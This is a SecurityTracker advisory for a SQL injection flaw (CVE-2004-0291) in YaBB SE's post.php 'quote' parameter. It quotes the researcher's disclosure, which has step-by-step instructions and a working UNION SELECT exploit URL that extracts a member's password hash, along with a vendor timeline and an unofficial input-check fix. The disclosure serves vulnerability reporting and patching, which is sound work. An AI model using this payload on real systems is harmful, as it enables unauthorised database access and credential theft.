SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   YaBB SE Vendors:   YaBBSE.org
YaBB SE 'post.php' Input Validation Flaw Permits SQL Injection
SecurityTracker Alert ID:  1009078
SecurityTracker URL:  http://securitytracker.com/id/1009078
CVE Reference:   CVE-2004-0291   (Links to External Site)
Updated:  Mar 26 2004
Original Entry Date:  Feb 17 2004
Impact:   Disclosure of user information, Execution of arbitrary code via network
Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.5.4, 1.5.5; possibly other versions
Description:   An input validation vulnerability was reported in YaBB SE in the 'post.php' file. A remote authenticated user can inject SQL commands.

It is reported that the 'quote' parameter is not properly validated. A remote authenticated user can submit a specially crafted URL to execute SQL commands on the underlying database. A demonstration exploit URL to obtain a user's hashed password is provided:

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;
quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

The vendor was reportedly notified on January 23, 2004.

Impact:   A remote user can execute SQL queries on the target system's database.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided an unofficial fix in the Source Message.

Vendor URL:  www.yabbse.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Another YabbSE SQL Injection


Summary
YaBB SE is a PHP/MySQL port of the popular forum software YaBB (yet another
bulletin board).

An SQL injection vulnerability allows a remote attacker to execute malicious
SQL statements on the database remotely

Details
Vulnerable Systems:
 * YaBB SE versions 1.5.4, 1.5.5, possibly others

The file Post.php is vulnerable to SQL injection because the quote parameter
isn't checked against malicious input, so is possible to inject SQL.

How To Exploit the vulnerability:

1- you need to be a registered user to exploit this hole.
2- Click any board you see. ex. General Discussion.
3- Click any message. ex Welcome to YaBB SE!
4- Now view the source code of this page and search this string "sesc"
withou the quotes this is the session id , is an hex number of 32 characters
ex.(13a478d8aa161c2231e6d3b36b6d19f2), you'll need this later
5- now your url is something like this
http://vulnhost/yabbse/index.php?board=1;action=display;threadid=1
6- change your url to look like this.

http://localhost:8080/yabbse//index.php?board=1;sesc=13a478d8aa161c2231e6d3b36b6d19f2;action=post;threadid=1;title=Post+reply;quote=-12)+UNION+SELECT+passwd,null,null,null,null,null,null,null,null+FROM+yabbse_members+where+ID_MEMBER=1/*

the value of sesc is the value you get before from the source code

Subject textBox something like this
Re:e320774659b1b23333bd033754d21bc4


Vendor Status:
january 23, 2004: I contacted the vendor
january 23, 2004: Vendor says they are working on it.
january 29, 2004: I send another email to know how the work was progressing.
No Response.
february 3, 2004 I send another email to know the status of the work.
february 4, 2004 Vendor says the'll figure how to do.
february 16, 2004 I doesn't want to keep waiting, so i publish the
vulnerability.

Temporal Solution:

Open Post.php and go around line 49

you'll see something like this.

 $quotemsg = $quote;


change to this.

 if ( !is_numeric($quote) )
 {
    die('Go out C==|=======>');
 }

 $quotemsg = $quote;

that's it.


Credits go to: BackSpace



[Editor's note:  Another user (Mike Bobbitt) reports that the if statement in 
the fix should instead say: 'if ( $quote && !is_numeric($quote) )']

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC